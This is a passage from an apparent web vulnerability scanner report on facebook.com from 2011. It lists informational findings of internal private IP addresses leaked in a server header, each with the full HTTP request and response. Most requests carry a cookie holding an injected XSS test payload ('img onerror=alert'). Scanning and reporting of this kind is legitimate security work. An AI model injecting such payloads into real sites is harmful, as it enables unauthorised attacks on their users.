Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.33
Connection: close
Date: Thu, 05 May 2011 11:42:16 GMT
Content-Length: 0


20.23. http://www.facebook.com/ajax/connect/vote.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/vote.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.32.223.126

Request

GET /ajax/connect/vote.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.223.126
Connection: close
Date: Thu, 05 May 2011 10:56:33 GMT
Content-Length: 0


20.24. http://www.facebook.com/ajax/connect/vote.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/vote.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.138.71

Request

GET /ajax/connect/vote.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.138.71
Connection: close
Date: Thu, 05 May 2011 11:42:15 GMT
Content-Length: 0


20.25. http://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.33.31.123

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.123
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 41058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.26. http://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.146.21

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.21
Connection: close
Date: Thu, 05 May 2011 11:42:17 GMT
Content-Length: 41058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.27. http://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.168.31

Request

GET /ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.31
Connection: close
Date: Thu, 05 May 2011 11:42:17 GMT
Content-Length: 44083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.28. http://www.facebook.com/ajax/reg_birthday_help.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/reg_birthday_help.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.163.55

Request

GET /ajax/reg_birthday_help.php?__a=1&__d=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
X-SVN-Rev: 374220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 707
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.52.163.55
X-Cnection: close
Date: Thu, 05 May 2011 11:43:24 GMT

for (;;);{"__ar":1,"payload":{"secure":false,"title":{"__html":"Why do I need to provide my birthday?"},"className":"birthday_warning_popup","body":{"__html":"Facebook requires all users to provide th
...[SNIP]...

20.29. http://www.facebook.com/ajax/register/logging.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/register/logging.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.198.51

Request

POST /ajax/register/logging.php?__a=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
Origin: http://www.facebook.com
X-SVN-Rev: 374220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613617025%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613618111%2C%22act%22%2C1304613617025%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fajax%2Freg_birthday_help.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C437%2C508%2C12%2C981%2C16%5D
Content-Length: 111

action=postload_focus&reg_instance=nozCTU1UnNH2U_CPdhUk4wOq&abtest_registration_group=1&fb_dtsg=yeP5w&lsd=zTWKd

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 34
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.52.198.51
X-Cnection: close
Date: Thu, 05 May 2011 11:43:30 GMT

for (;;);{"__ar":1,"payload":null}

20.30. http://www.facebook.com/aol

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aol

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.187.63

Request

GET /aol HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.63
Connection: close
Date: Thu, 05 May 2011 11:40:09 GMT
Content-Length: 39885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.31. http://www.facebook.com/aolradio

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aolradio

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.190.33

Request

GET /aolradio HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.33
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 34803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

20.32. http://www.facebook.com/badges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.157.31

Request

GET /badges?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/?ref=pf
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.157.31
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 0


20.33. http://www.facebook.com/badges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.198.51

Request

GET /badges HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.51
Connection: close
Date: Thu, 05 May 2011 11:42:55 GMT
Content-Length: 0


20.34. http://www.facebook.com/badges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.32.222.119

Request

GET /badges HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.119
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 0


20.35. http://www.facebook.com/burkerkink

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /burkerkink

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.190.63

Request

GET /burkerkink HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.63
Connection: close
Date: Thu, 05 May 2011 11:42:28 GMT
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.36. http://www.facebook.com/campaign/landing.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.136.41

Request

GET /campaign/landing.php?placement=pflo&campaign_id=402047449186&extra_1=auto HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; expires=Sat, 04-Jun-2011 11:42:08 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.136.41
Connection: close
Date: Thu, 05 May 2011 11:42:08 GMT
Content-Length: 0


20.37. http://www.facebook.com/campaign/landing.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.140.63

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 11:42:06 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.140.63
Connection: close
Date: Thu, 05 May 2011 11:42:06 GMT
Content-Length: 0


20.38. http://www.facebook.com/campaign/landing.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.32.222.101

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 10:56:36 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.222.101
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 0


20.39. http://www.facebook.com/campaign/landing.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.191.29

Request

